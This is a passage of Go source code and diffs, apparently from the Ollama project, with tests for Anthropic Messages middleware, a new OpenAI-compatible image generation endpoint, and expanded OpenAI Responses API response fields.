"top_k": 40,
"stop_sequences": ["\n", "END"],
"messages": [
{"role": "user", "content": "Hello"}
]
}`,
req: api.ChatRequest{
Model: "test-model",
Messages: []api.Message{
{Role: "user", Content: "Hello"},
},
Options: map[string]any{
"num_predict": 2048,
"temperature": 0.7,
"top_p": 0.9,
"top_k": 40,
"stop": []string{"\n", "END"},
},
Stream: &False,
},
},
{
name: "streaming",
body: `{
"model": "test-model",
"max_tokens": 1024,
"stream": true,
"messages": [
{"role": "user", "content": "Hello"}
]
}`,
req: api.ChatRequest{
Model: "test-model",
Messages: []api.Message{
{Role: "user", Content: "Hello"},
},
Options: map[string]any{"num_predict": 1024},
Stream: &stream,
},
},
{
name: "with tools",
body: `{
"model": "test-model",
"max_tokens": 1024,
"messages": [
{"role": "user", "content": "What's the weather?"}
],
"tools": [{
"name": "get_weather",
"description": "Get current weather",
"input_schema": {
"type": "object",
"properties": {
"location": {"type": "string"}
},
"required": ["location"]
}
}]
}`,
req: api.ChatRequest{
Model: "test-model",
Messages: []api.Message{
{Role: "user", Content: "What's the weather?"},
},
Tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Get current weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Required: []string{"location"},
Properties: testProps(map[string]api.ToolProperty{
"location": {Type: api.PropertyType{"string"}},
}),
},
},
},
},
Options: map[string]any{"num_predict": 1024},
Stream: &False,
},
},
{
name: "with tool result",
body: `{
"model": "test-model",
"max_tokens": 1024,
"messages": [
{"role": "user", "content": "What's the weather?"},
{"role": "assistant", "content": [
{"type": "tool_use", "id": "call_123", "name": "get_weather", "input": {"location": "Paris"}}
]},
{"role": "user", "content": [
{"type": "tool_result", "tool_use_id": "call_123", "content": "Sunny, 22°C"}
]}
]
}`,
req: api.ChatRequest{
Model: "test-model",
Messages: []api.Message{
{Role: "user", Content: "What's the weather?"},
{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
ID: "call_123",
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "Paris"}),
},
},
},
},
{Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call_123"},
},
Options: map[string]any{"num_predict": 1024},
Stream: &False,
},
},
{
name: "with thinking enabled",
body: `{
"model": "test-model",
"max_tokens": 1024,
"thinking": {"type": "enabled", "budget_tokens": 1000},
"messages": [
{"role": "user", "content": "Hello"}
]
}`,
req: api.ChatRequest{
Model: "test-model",
Messages: []api.Message{
{Role: "user", Content: "Hello"},
},
Options: map[string]any{"num_predict": 1024},
Stream: &False,
Think: &api.ThinkValue{Value: true},
},
},
{
name: "missing model error",
body: `{
"max_tokens": 1024,
"messages": [
{"role": "user", "content": "Hello"}
]
}`,
err: anthropic.ErrorResponse{
Type: "error",
Error: anthropic.Error{
Type: "invalid_request_error",
Message: "model is required",
},
},
},
{
name: "missing max_tokens error",
body: `{
"model": "test-model",
"messages": [
{"role": "user", "content": "Hello"}
]
}`,
err: anthropic.ErrorResponse{
Type: "error",
Error: anthropic.Error{
Type: "invalid_request_error",
Message: "max_tokens is required and must be positive",
},
},
},
{
name: "missing messages error",
body: `{
"model": "test-model",
"max_tokens": 1024
}`,
err: anthropic.ErrorResponse{
Type: "error",
Error: anthropic.Error{
Type: "invalid_request_error",
Message: "messages is required",
},
},
},
{
name: "tool_use missing id error",
body: `{
"model": "test-model",
"max_tokens": 1024,
"messages": [
{"role": "assistant", "content": [
{"type": "tool_use", "name": "test"}
]}
]
}`,
err: anthropic.ErrorResponse{
Type: "error",
Error: anthropic.Error{
Type: "invalid_request_error",
Message: "tool_use block missing required 'id' field",
},
},
},
}
endpoint := func(c *gin.Context) {
c.Status(http.StatusOK)
}
gin.SetMode(gin.TestMode)
router := gin.New()
router.Use(AnthropicMessagesMiddleware(), captureAnthropicRequest(&capturedRequest))
router.Handle(http.MethodPost, "/v1/messages", endpoint)
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(tc.body))
req.Header.Set("Content-Type", "application/json")
defer func() { capturedRequest = nil }()
resp := httptest.NewRecorder()
router.ServeHTTP(resp, req)
if tc.err.Type != "" {
// Expect error
if resp.Code == http.StatusOK {
t.Fatalf("expected error response, got 200 OK")
}
var errResp anthropic.ErrorResponse
if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
t.Fatalf("failed to unmarshal error: %v", err)
}
if errResp.Type != tc.err.Type {
t.Errorf("expected error type %q, got %q", tc.err.Type, errResp.Type)
}
if errResp.Error.Type != tc.err.Error.Type {
t.Errorf("expected error.type %q, got %q", tc.err.Error.Type, errResp.Error.Type)
}
if errResp.Error.Message != tc.err.Error.Message {
t.Errorf("expected error.message %q, got %q", tc.err.Error.Message, errResp.Error.Message)
}
return
}
if resp.Code != http.StatusOK {
t.Fatalf("unexpected status code: %d, body: %s", resp.Code, resp.Body.String())
}
if capturedRequest == nil {
t.Fatal("request was not captured")
}
// Compare relevant fields
if capturedRequest.Model != tc.req.Model {
t.Errorf("model mismatch: got %q, want %q", capturedRequest.Model, tc.req.Model)
}
if diff := cmp.Diff(tc.req.Messages, capturedRequest.Messages,
cmpopts.IgnoreUnexported(api.ToolCallFunctionArguments{}, api.ToolPropertiesMap{})); diff != "" {
t.Errorf("messages mismatch (-want +got):\n%s", diff)
}
if tc.req.Stream != nil && capturedRequest.Stream != nil {
if *tc.req.Stream != *capturedRequest.Stream {
t.Errorf("stream mismatch: got %v, want %v", *capturedRequest.Stream, *tc.req.Stream)
}
}
if tc.req.Think != nil {
if capturedRequest.Think == nil {
t.Error("expected Think to be set")
} else if capturedRequest.Think.Value != tc.req.Think.Value {
t.Errorf("Think mismatch: got %v, want %v", capturedRequest.Think.Value, tc.req.Think.Value)
}
}
})
}
}
func TestAnthropicMessagesMiddleware_Headers(t *testing.T) {
gin.SetMode(gin.TestMode)
t.Run("streaming sets correct headers", func(t *testing.T) {
router := gin.New()
router.Use(AnthropicMessagesMiddleware())
router.POST("/v1/messages", func(c *gin.Context) {
// Check headers were set
if c.Writer.Header().Get("Content-Type") != "text/event-stream" {
t.Errorf("expected Content-Type text/event-stream, got %q", c.Writer.Header().Get("Content-Type"))
}
if c.Writer.Header().Get("Cache-Control") != "no-cache" {
t.Errorf("expected Cache-Control no-cache, got %q", c.Writer.Header().Get("Cache-Control"))
}
c.Status(http.StatusOK)
})
body := `{"model": "test", "max_tokens": 100, "stream": true, "messages": [{"role": "user", "content": "Hi"}]}`
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
req.Header.Set("Content-Type", "application/json")
resp := httptest.NewRecorder()
router.ServeHTTP(resp, req)
})
}
func TestAnthropicMessagesMiddleware_InvalidJSON(t *testing.T) {
gin.SetMode(gin.TestMode)
router := gin.New()
router.Use(AnthropicMessagesMiddleware())
router.POST("/v1/messages", func(c *gin.Context) {
c.Status(http.StatusOK)
})
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(`{invalid json`))
req.Header.Set("Content-Type", "application/json")
resp := httptest.NewRecorder()
router.ServeHTTP(resp, req)
if resp.Code != http.StatusBadRequest {
t.Errorf("expected status 400, got %d", resp.Code)
}
var errResp anthropic.ErrorResponse
if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
t.Fatalf("failed to unmarshal error: %v", err)
}
if errResp.Type != "error" {
t.Errorf("expected type 'error', got %q", errResp.Type)
}
if errResp.Error.Type != "invalid_request_error" {
t.Errorf("expected error type 'invalid_request_error', got %q", errResp.Error.Type)
}
}
func TestAnthropicWriter_NonStreaming(t *testing.T) {
gin.SetMode(gin.TestMode)
router := gin.New()
router.Use(AnthropicMessagesMiddleware())
router.POST("/v1/messages", func(c *gin.Context) {
// Simulate Ollama response
resp := api.ChatResponse{
Model: "test-model",
Message: api.Message{
Role: "assistant",
Content: "Hello there!",
},
Done: true,
DoneReason: "stop",
Metrics: api.Metrics{
PromptEvalCount: 10,
EvalCount: 5,
},
}
data, _ := json.Marshal(resp)
c.Writer.WriteHeader(http.StatusOK)
_, _ = c.Writer.Write(data)
})
body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
req.Header.Set("Content-Type", "application/json")
resp := httptest.NewRecorder()
router.ServeHTTP(resp, req)
if resp.Code != http.StatusOK {
t.Fatalf("expected status 200, got %d", resp.Code)
}
var result anthropic.MessagesResponse
if err := json.Unmarshal(resp.Body.Bytes(), &result); err != nil {
t.Fatalf("failed to unmarshal response: %v", err)
}
if result.Type != "message" {
t.Errorf("expected type 'message', got %q", result.Type)
}
if result.Role != "assistant" {
t.Errorf("expected role 'assistant', got %q", result.Role)
}
if len(result.Content) != 1 {
t.Fatalf("expected 1 content block, got %d", len(result.Content))
}
if result.Content[0].Text == nil || *result.Content[0].Text != "Hello there!" {
t.Errorf("expected text 'Hello there!', got %v", result.Content[0].Text)
}
if result.StopReason != "end_turn" {
t.Errorf("expected stop_reason 'end_turn', got %q", result.StopReason)
}
if result.Usage.InputTokens != 10 {
t.Errorf("expected input_tokens 10, got %d", result.Usage.InputTokens)
}
if result.Usage.OutputTokens != 5 {
t.Errorf("expected output_tokens 5, got %d", result.Usage.OutputTokens)
}
}
// TestAnthropicWriter_ErrorFromRoutes tests error handling when routes.go sends
// gin.H{"error": "message"} without a StatusCode field (which is the common case)
func TestAnthropicWriter_ErrorFromRoutes(t *testing.T) {
gin.SetMode(gin.TestMode)
tests := []struct {
name string
statusCode int
errorPayload any
wantErrorType string
wantMessage string
}{
// routes.go sends errors without StatusCode in JSON, so we must use HTTP status
{
name: "404 with gin.H error (model not found)",
statusCode: http.StatusNotFound,
errorPayload: gin.H{"error": "model 'nonexistent' not found"},
wantErrorType: "not_found_error",
wantMessage: "model 'nonexistent' not found",
},
{
name: "400 with gin.H error (bad request)",
statusCode: http.StatusBadRequest,
errorPayload: gin.H{"error": "model is required"},
wantErrorType: "invalid_request_error",
wantMessage: "model is required",
},
{
name: "500 with gin.H error (internal error)",
statusCode: http.StatusInternalServerError,
errorPayload: gin.H{"error": "something went wrong"},
wantErrorType: "api_error",
wantMessage: "something went wrong",
},
{
name: "404 with api.StatusError",
statusCode: http.StatusNotFound,
errorPayload: api.StatusError{
StatusCode: http.StatusNotFound,
ErrorMessage: "model not found via StatusError",
},
wantErrorType: "not_found_error",
wantMessage: "model not found via StatusError",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
router := gin.New()
router.Use(AnthropicMessagesMiddleware())
router.POST("/v1/messages", func(c *gin.Context) {
// Simulate what routes.go does - set status and write error JSON
data, _ := json.Marshal(tt.errorPayload)
c.Writer.WriteHeader(tt.statusCode)
_, _ = c.Writer.Write(data)
})
body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
req.Header.Set("Content-Type", "application/json")
resp := httptest.NewRecorder()
router.ServeHTTP(resp, req)
if resp.Code != tt.statusCode {
t.Errorf("expected status %d, got %d", tt.statusCode, resp.Code)
}
var errResp anthropic.ErrorResponse
if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
t.Fatalf("failed to unmarshal error response: %v\nbody: %s", err, resp.Body.String())
}
if errResp.Type != "error" {
t.Errorf("expected type 'error', got %q", errResp.Type)
}
if errResp.Error.Type != tt.wantErrorType {
t.Errorf("expected error type %q, got %q", tt.wantErrorType, errResp.Error.Type)
}
if errResp.Error.Message != tt.wantMessage {
t.Errorf("expected message %q, got %q", tt.wantMessage, errResp.Error.Message)
}
})
}
}
func TestAnthropicMessagesMiddleware_SetsRelaxThinkingFlag(t *testing.T) {
gin.SetMode(gin.TestMode)
var flagSet bool
router := gin.New()
router.Use(AnthropicMessagesMiddleware())
router.POST("/v1/messages", func(c *gin.Context) {
_, flagSet = c.Get("relax_thinking")
c.Status(http.StatusOK)
})
body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
req.Header.Set("Content-Type", "application/json")
resp := httptest.NewRecorder()
router.ServeHTTP(resp, req)
if !flagSet {
t.Error("expected relax_thinking flag to be set in context")
}
}

View File

@@ -8,6 +8,7 @@ import (
"math/rand"
"net/http"
"strings"
"time"
"github.com/gin-gonic/gin"
@@ -49,6 +50,11 @@ type EmbedWriter struct {
encodingFormat string
}
type ImageWriter struct {
BaseWriter
done bool
}
func (w *BaseWriter) writeError(data []byte) (int, error) {
var serr api.StatusError
err := json.Unmarshal(data, &serr)
@@ -273,6 +279,36 @@ func (w *EmbedWriter) Write(data []byte) (int, error) {
return w.writeResponse(data)
}
func (w *ImageWriter) writeResponse(data []byte) (int, error) {
var generateResponse api.GenerateResponse
err := json.Unmarshal(data, &generateResponse)
if err != nil {
return 0, err
}
// Image generation doesn't support streaming in the OpenAI API sense,
// so we only write the response when done with images
if generateResponse.Done && len(generateResponse.Images) > 0 {
w.done = true
w.ResponseWriter.Header().Set("Content-Type", "application/json")
err = json.NewEncoder(w.ResponseWriter).Encode(openai.ToImageGenerationResponse(generateResponse))
if err != nil {
return 0, err
}
}
return len(data), nil
}
func (w *ImageWriter) Write(data []byte) (int, error) {
code := w.ResponseWriter.Status()
if code != http.StatusOK {
return w.writeError(data)
}
return w.writeResponse(data)
}
func ListMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
w := &ListWriter{
@@ -392,6 +428,43 @@ func EmbeddingsMiddleware() gin.HandlerFunc {
}
}
func ImageGenerationsMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
var req openai.ImageGenerationRequest
err := c.ShouldBindJSON(&req)
if err != nil {
c.AbortWithStatusJSON(http.StatusBadRequest, openai.NewError(http.StatusBadRequest, err.Error()))
return
}
if req.Prompt == "" {
c.AbortWithStatusJSON(http.StatusBadRequest, openai.NewError(http.StatusBadRequest, "prompt is required"))
return
}
if req.Model == "" {
c.AbortWithStatusJSON(http.StatusBadRequest, openai.NewError(http.StatusBadRequest, "model is required"))
return
}
var b bytes.Buffer
genReq := openai.FromImageGenerationRequest(req)
if err := json.NewEncoder(&b).Encode(genReq); err != nil {
c.AbortWithStatusJSON(http.StatusInternalServerError, openai.NewError(http.StatusInternalServerError, err.Error()))
return
}
c.Request.Body = io.NopCloser(&b)
w := &ImageWriter{
BaseWriter: BaseWriter{ResponseWriter: c.Writer},
}
c.Writer = w
c.Next()
}
}
func ChatMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
var req openai.ChatCompletionRequest
@@ -441,6 +514,7 @@ type ResponsesWriter struct {
stream bool
responseID string
itemID string
request openai.ResponsesRequest
}
func (w *ResponsesWriter) writeEvent(eventType string, data any) error {
@@ -478,7 +552,9 @@ func (w *ResponsesWriter) writeResponse(data []byte) (int, error) {
// Non-streaming response
w.ResponseWriter.Header().Set("Content-Type", "application/json")
response := openai.ToResponse(w.model, w.responseID, w.itemID, chatResponse)
response := openai.ToResponse(w.model, w.responseID, w.itemID, chatResponse, w.request)
completedAt := time.Now().Unix()
response.CompletedAt = &completedAt
return len(data), json.NewEncoder(w.ResponseWriter).Encode(response)
}
@@ -523,11 +599,12 @@ func ResponsesMiddleware() gin.HandlerFunc {
w := &ResponsesWriter{
BaseWriter: BaseWriter{ResponseWriter: c.Writer},
converter: openai.NewResponsesStreamConverter(responseID, itemID, req.Model),
converter: openai.NewResponsesStreamConverter(responseID, itemID, req.Model, req),
model: req.Model,
stream: streamRequested,
responseID: responseID,
itemID: itemID,
request: req,
}
// Set headers based on streaming mode

View File

@@ -961,3 +961,143 @@ func TestRetrieveMiddleware(t *testing.T) {
}
}
}
func TestImageGenerationsMiddleware(t *testing.T) {
type testCase struct {
name string
body string
req api.GenerateRequest
err openai.ErrorResponse
}
var capturedRequest *api.GenerateRequest
streamFalse := false
testCases := []testCase{
{
name: "image generation handler",
body: `{
"model": "flux",
"prompt": "a cat"
}`,
req: api.GenerateRequest{
Model: "flux",
Prompt: "a cat",
Stream: &streamFalse,
},
},
{
name: "image generation with size",
body: `{
"model": "flux",
"prompt": "a dog",
"size": "512x512"
}`,
req: api.GenerateRequest{
Model: "flux",
Prompt: "a dog",
Stream: &streamFalse,
},
},
{
name: "missing prompt error",
body: `{
"model": "flux"
}`,
err: openai.ErrorResponse{
Error: openai.Error{
Message: "prompt is required",
Type: "invalid_request_error",
},
},
},
{
name: "missing model error",
body: `{
"prompt": "a cat"
}`,
err: openai.ErrorResponse{
Error: openai.Error{
Message: "model is required",
Type: "invalid_request_error",
},
},
},
}
endpoint := func(c *gin.Context) {
c.Status(http.StatusOK)
}
gin.SetMode(gin.TestMode)
router := gin.New()
router.Use(ImageGenerationsMiddleware(), captureRequestMiddleware(&capturedRequest))
router.Handle(http.MethodPost, "/api/generate", endpoint)
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
req, _ := http.NewRequest(http.MethodPost, "/api/generate", strings.NewReader(tc.body))
req.Header.Set("Content-Type", "application/json")
resp := httptest.NewRecorder()
router.ServeHTTP(resp, req)
var errResp openai.ErrorResponse
if resp.Code != http.StatusOK {
if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
t.Fatal(err)
}
}
if capturedRequest != nil && !reflect.DeepEqual(tc.req, *capturedRequest) {
t.Fatalf("requests did not match\nExpected: %+v\nActual: %+v", tc.req, *capturedRequest)
}
if !reflect.DeepEqual(tc.err, errResp) {
t.Fatalf("errors did not match\nExpected: %+v\nActual: %+v", tc.err, errResp)
}
capturedRequest = nil
})
}
}
func TestImageWriterIntegration(t *testing.T) {
gin.SetMode(gin.TestMode)
t.Run("transforms generate response to openai format", func(t *testing.T) {
router := gin.New()
router.Use(ImageGenerationsMiddleware())
router.POST("/api/generate", func(c *gin.Context) {
// Simulate an image generation response
generateResponse := api.GenerateResponse{
Done: true,
CreatedAt: time.Now(),
Images: []string{"base64encodedimage"},
}
c.JSON(http.StatusOK, generateResponse)
})
req, _ := http.NewRequest(http.MethodPost, "/api/generate", strings.NewReader(`{"model":"flux","prompt":"a cat"}`))
req.Header.Set("Content-Type", "application/json")
resp := httptest.NewRecorder()
router.ServeHTTP(resp, req)
if resp.Code != http.StatusOK {
t.Fatalf("expected status 200, got %d: %s", resp.Code, resp.Body.String())
}
var response openai.ImageGenerationResponse
if err := json.Unmarshal(resp.Body.Bytes(), &response); err != nil {
t.Fatalf("failed to unmarshal response: %v", err)
}
if len(response.Data) != 1 {
t.Fatalf("expected 1 image, got %d", len(response.Data))
}
if response.Data[0].B64JSON != "base64encodedimage" {
t.Fatalf("expected image data 'base64encodedimage', got '%s'", response.Data[0].B64JSON)
}
})
}

View File

@@ -630,6 +630,10 @@ func nameFromToolCallID(messages []Message, toolCallID string) string {
// decodeImageURL decodes a base64 data URI into raw image bytes.
func decodeImageURL(url string) (api.ImageData, error) {
if strings.HasPrefix(url, "http://") || strings.HasPrefix(url, "https://") {
return nil, errors.New("image URLs are not currently supported, please use base64 encoded data instead")
}
types := []string{"jpeg", "jpg", "png", "webp"}
// Support blank mime type to match /api/chat's behavior of taking just unadorned base64
@@ -733,3 +737,46 @@ func FromCompleteRequest(r CompletionRequest) (api.GenerateRequest, error) {
DebugRenderOnly: r.DebugRenderOnly,
}, nil
}
// ImageGenerationRequest is an OpenAI-compatible image generation request.
type ImageGenerationRequest struct {
Model string `json:"model"`
Prompt string `json:"prompt"`
N int `json:"n,omitempty"`
Size string `json:"size,omitempty"`
ResponseFormat string `json:"response_format,omitempty"`
}
// ImageGenerationResponse is an OpenAI-compatible image generation response.
type ImageGenerationResponse struct {
Created int64 `json:"created"`
Data []ImageURLOrData `json:"data"`
}
// ImageURLOrData contains either a URL or base64-encoded image data.
type ImageURLOrData struct {
URL string `json:"url,omitempty"`
B64JSON string `json:"b64_json,omitempty"`
}
// FromImageGenerationRequest converts an OpenAI image generation request to an Ollama GenerateRequest.
func FromImageGenerationRequest(r ImageGenerationRequest) api.GenerateRequest {
stream := false
return api.GenerateRequest{
Model: r.Model,
Prompt: r.Prompt,
Stream: &stream,
}
}
// ToImageGenerationResponse converts an Ollama GenerateResponse to an OpenAI ImageGenerationResponse.
func ToImageGenerationResponse(resp api.GenerateResponse) ImageGenerationResponse {
data := make([]ImageURLOrData, 0)
for _, img := range resp.Images {
data = append(data, ImageURLOrData{B64JSON: img})
}
return ImageGenerationResponse{
Created: resp.CreatedAt.Unix(),
Data: data,
}
}

View File

@@ -4,6 +4,7 @@ import (
"encoding/json"
"fmt"
"math/rand"
"time"
"github.com/ollama/ollama/api"
)
@@ -265,9 +266,9 @@ type ResponsesText struct {
type ResponsesTool struct {
Type string `json:"type"` // "function"
Name string `json:"name"`
Description string `json:"description,omitempty"`
Strict bool `json:"strict,omitempty"`
Parameters map[string]any `json:"parameters,omitempty"`
Description *string `json:"description"` // nullable but required
Strict *bool `json:"strict"` // nullable but required
Parameters map[string]any `json:"parameters"` // nullable but required
}
type ResponsesRequest struct {
@@ -475,11 +476,16 @@ func convertTool(t ResponsesTool) (api.Tool, error) {
}
}
var description string
if t.Description != nil {
description = *t.Description
}
return api.Tool{
Type: t.Type,
Function: api.ToolFunction{
Name: t.Name,
Description: t.Description,
Description: description,
Parameters: params,
},
}, nil
@@ -516,17 +522,60 @@ func convertInputMessage(m ResponsesInputMessage) (api.Message, error) {
// Response types for the Responses API
// ResponsesTextField represents the text output configuration in the response.
type ResponsesTextField struct {
Format ResponsesTextFormat `json:"format"`
}
// ResponsesReasoningOutput represents reasoning configuration in the response.
type ResponsesReasoningOutput struct {
Effort *string `json:"effort,omitempty"`
Summary *string `json:"summary,omitempty"`
}
// ResponsesError represents an error in the response.
type ResponsesError struct {
Code string `json:"code"`
Message string `json:"message"`
}
// ResponsesIncompleteDetails represents details about why a response was incomplete.
type ResponsesIncompleteDetails struct {
Reason string `json:"reason"`
}
type ResponsesResponse struct {
ID string `json:"id"`
Object string `json:"object"`
CreatedAt int64 `json:"created_at"`
Status string `json:"status"`
Model string `json:"model"`
Output []ResponsesOutputItem `json:"output"`
Usage *ResponsesUsage `json:"usage,omitempty"`
// TODO(drifkin): add `temperature` and `top_p` to the response, but this
// requires additional plumbing to find the effective values since the
// defaults can come from the model or the request
ID string `json:"id"`
Object string `json:"object"`
CreatedAt int64 `json:"created_at"`
CompletedAt *int64 `json:"completed_at"`
Status string `json:"status"`
IncompleteDetails *ResponsesIncompleteDetails `json:"incomplete_details"`
Model string `json:"model"`
PreviousResponseID *string `json:"previous_response_id"`
Instructions *string `json:"instructions"`
Output []ResponsesOutputItem `json:"output"`
Error *ResponsesError `json:"error"`
Tools []ResponsesTool `json:"tools"`
ToolChoice any `json:"tool_choice"`
Truncation string `json:"truncation"`
ParallelToolCalls bool `json:"parallel_tool_calls"`
Text ResponsesTextField `json:"text"`
TopP float64 `json:"top_p"`
PresencePenalty float64 `json:"presence_penalty"`
FrequencyPenalty float64 `json:"frequency_penalty"`
TopLogprobs int `json:"top_logprobs"`
Temperature float64 `json:"temperature"`
Reasoning *ResponsesReasoningOutput `json:"reasoning"`
Usage *ResponsesUsage `json:"usage"`
MaxOutputTokens *int `json:"max_output_tokens"`
MaxToolCalls *int `json:"max_tool_calls"`
Store bool `json:"store"`
Background bool `json:"background"`
ServiceTier string `json:"service_tier"`
Metadata map[string]any `json:"metadata"`
SafetyIdentifier *string `json:"safety_identifier"`
PromptCacheKey *string `json:"prompt_cache_key"`
}
type ResponsesOutputItem struct {
@@ -550,18 +599,39 @@ type ResponsesReasoningSummary struct {
}
type ResponsesOutputContent struct {
Type string `json:"type"` // "output_text"
Text string `json:"text"`
Type string `json:"type"` // "output_text"
Text string `json:"text"`
Annotations []any `json:"annotations"`
Logprobs []any `json:"logprobs"`
}
type ResponsesInputTokensDetails struct {
CachedTokens int `json:"cached_tokens"`
}
type ResponsesOutputTokensDetails struct {
ReasoningTokens int `json:"reasoning_tokens"`
}
type ResponsesUsage struct {
InputTokens int `json:"input_tokens"`
OutputTokens int `json:"output_tokens"`
TotalTokens int `json:"total_tokens"`
InputTokens int `json:"input_tokens"`
OutputTokens int `json:"output_tokens"`
TotalTokens int `json:"total_tokens"`
InputTokensDetails ResponsesInputTokensDetails `json:"input_tokens_details"`
OutputTokensDetails ResponsesOutputTokensDetails `json:"output_tokens_details"`
}
// ToResponse converts an api.ChatResponse to a Responses API response
func ToResponse(model, responseID, itemID string, chatResponse api.ChatResponse) ResponsesResponse {
// derefFloat64 returns the value of a float64 pointer, or a default if nil.
func derefFloat64(p *float64, def float64) float64 {
if p != nil {
return *p
}
return def
}
// ToResponse converts an api.ChatResponse to a Responses API response.
// The request is used to echo back request parameters in the response.
func ToResponse(model, responseID, itemID string, chatResponse api.ChatResponse, request ResponsesRequest) ResponsesResponse {
var output []ResponsesOutputItem
// Add reasoning item if thinking is present
@@ -585,6 +655,7 @@ func ToResponse(model, responseID, itemID string, chatResponse api.ChatResponse)
output = append(output, ResponsesOutputItem{
ID: fmt.Sprintf("fc_%s_%d", responseID, i),
Type: "function_call",
Status: "completed",
CallID: tc.ID,
Name: tc.Function.Name,
Arguments: tc.Function.Arguments,
@@ -598,25 +669,90 @@ func ToResponse(model, responseID, itemID string, chatResponse api.ChatResponse)
Role: "assistant",
Content: []ResponsesOutputContent{
{
Type: "output_text",
Text: chatResponse.Message.Content,
Type: "output_text",
Text: chatResponse.Message.Content,
Annotations: []any{},
Logprobs: []any{},
},
},
})
}
var instructions *string
if request.Instructions != "" {
instructions = &request.Instructions
}
// Build truncation with default
truncation := "disabled"
if request.Truncation != nil {
truncation = *request.Truncation
}
tools := request.Tools
if tools == nil {
tools = []ResponsesTool{}
}
text := ResponsesTextField{
Format: ResponsesTextFormat{Type: "text"},
}
if request.Text != nil && request.Text.Format != nil {
text.Format = *request.Text.Format
}
// Build reasoning output from request
var reasoning *ResponsesReasoningOutput
if request.Reasoning.Effort != "" || request.Reasoning.Summary != "" {
reasoning = &ResponsesReasoningOutput{}
if request.Reasoning.Effort != "" {
reasoning.Effort = &request.Reasoning.Effort
}
if request.Reasoning.Summary != "" {
reasoning.Summary = &request.Reasoning.Summary
}
}
return ResponsesResponse{
ID: responseID,
Object: "response",
CreatedAt: chatResponse.CreatedAt.Unix(),
Status: "completed",
Model: model,
Output: output,
ID: responseID,
Object: "response",
CreatedAt: chatResponse.CreatedAt.Unix(),
CompletedAt: nil, // Set by middleware when writing final response
Status: "completed",
IncompleteDetails: nil, // Only populated if response incomplete
Model: model,
PreviousResponseID: nil, // Not supported
Instructions: instructions,
Output: output,
Error: nil, // Only populated on failure
Tools: tools,
ToolChoice: "auto", // Default value
Truncation: truncation,
ParallelToolCalls: true, // Default value
Text: text,
TopP: derefFloat64(request.TopP, 1.0),
PresencePenalty: 0, // Default value
FrequencyPenalty: 0, // Default value
TopLogprobs: 0, // Default value
Temperature: derefFloat64(request.Temperature, 1.0),
Reasoning: reasoning,
Usage: &ResponsesUsage{
InputTokens: chatResponse.PromptEvalCount,
OutputTokens: chatResponse.EvalCount,
TotalTokens: chatResponse.PromptEvalCount + chatResponse.EvalCount,
// TODO(drifkin): wire through the actual values
InputTokensDetails: ResponsesInputTokensDetails{CachedTokens: 0},
// TODO(drifkin): wire through the actual values
OutputTokensDetails: ResponsesOutputTokensDetails{ReasoningTokens: 0},
},
MaxOutputTokens: request.MaxOutputTokens,
MaxToolCalls: nil, // Not supported
Store: false, // We don't store responses
Background: request.Background,
ServiceTier: "default", // Default value
Metadata: map[string]any{},
SafetyIdentifier: nil, // Not supported
PromptCacheKey: nil, // Not supported
}
}
@@ -636,6 +772,7 @@ type ResponsesStreamConverter struct {
responseID string
itemID string
model string
request ResponsesRequest
// State tracking (mutated across Process calls)
firstWrite bool
@@ -668,11 +805,12 @@ func (c *ResponsesStreamConverter) newEvent(eventType string, data map[string]an
}
// NewResponsesStreamConverter creates a new converter with the given configuration.
func NewResponsesStreamConverter(responseID, itemID, model string) *ResponsesStreamConverter {
func NewResponsesStreamConverter(responseID, itemID, model string, request ResponsesRequest) *ResponsesStreamConverter {
return &ResponsesStreamConverter{
responseID: responseID,
itemID: itemID,
model: model,
request: request,
firstWrite: true,
}
}
@@ -717,25 +855,120 @@ func (c *ResponsesStreamConverter) Process(r api.ChatResponse) []ResponsesStream
return events
}
// buildResponseObject creates a full response object with all required fields for streaming events.
func (c *ResponsesStreamConverter) buildResponseObject(status string, output []any, usage map[string]any) map[string]any {
var instructions any = nil
if c.request.Instructions != "" {
instructions = c.request.Instructions
}
truncation := "disabled"
if c.request.Truncation != nil {
truncation = *c.request.Truncation
}
var tools []any
if c.request.Tools != nil {
for _, t := range c.request.Tools {
tools = append(tools, map[string]any{
"type": t.Type,
"name": t.Name,
"description": t.Description,
"strict": t.Strict,
"parameters": t.Parameters,
})
}
}
if tools == nil {
tools = []any{}
}
textFormat := map[string]any{"type": "text"}
if c.request.Text != nil && c.request.Text.Format != nil {
textFormat = map[string]any{
"type": c.request.Text.Format.Type,
}
if c.request.Text.Format.Name != "" {
textFormat["name"] = c.request.Text.Format.Name
}
if c.request.Text.Format.Schema != nil {
textFormat["schema"] = c.request.Text.Format.Schema
}
if c.request.Text.Format.Strict != nil {
textFormat["strict"] = *c.request.Text.Format.Strict
}
}
var reasoning any = nil
if c.request.Reasoning.Effort != "" || c.request.Reasoning.Summary != "" {
r := map[string]any{}
if c.request.Reasoning.Effort != "" {
r["effort"] = c.request.Reasoning.Effort
} else {
r["effort"] = nil
}
if c.request.Reasoning.Summary != "" {
r["summary"] = c.request.Reasoning.Summary
} else {
